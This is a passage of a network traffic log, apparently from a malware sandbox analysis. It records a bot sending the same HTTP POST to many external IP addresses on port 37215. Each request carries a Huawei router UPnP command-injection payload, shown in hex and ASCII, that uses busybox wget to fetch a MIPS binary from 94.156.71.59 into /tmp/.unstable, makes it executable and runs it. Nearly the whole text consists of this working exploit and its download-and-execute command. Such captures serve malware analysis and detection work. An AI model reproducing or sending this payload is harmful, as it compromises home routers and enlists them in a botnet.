39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            296192.168.2.133487241.73.107.24937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.231115103 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            297192.168.2.1349858156.36.86.23737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.231961966 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            298192.168.2.1333494197.159.198.5137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.232831001 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            299192.168.2.1359904197.114.103.5137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.233671904 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            300192.168.2.1343084156.178.253.20337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.234498024 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            301192.168.2.1351868197.27.124.21137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.235343933 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            302192.168.2.1345428156.103.207.137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.236294985 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            303192.168.2.134212441.235.244.22437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.237158060 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            304192.168.2.1357242197.145.93.18437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.238002062 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            305192.168.2.1356428197.11.239.2037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.238847971 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            306192.168.2.133393041.183.245.2637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.239702940 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
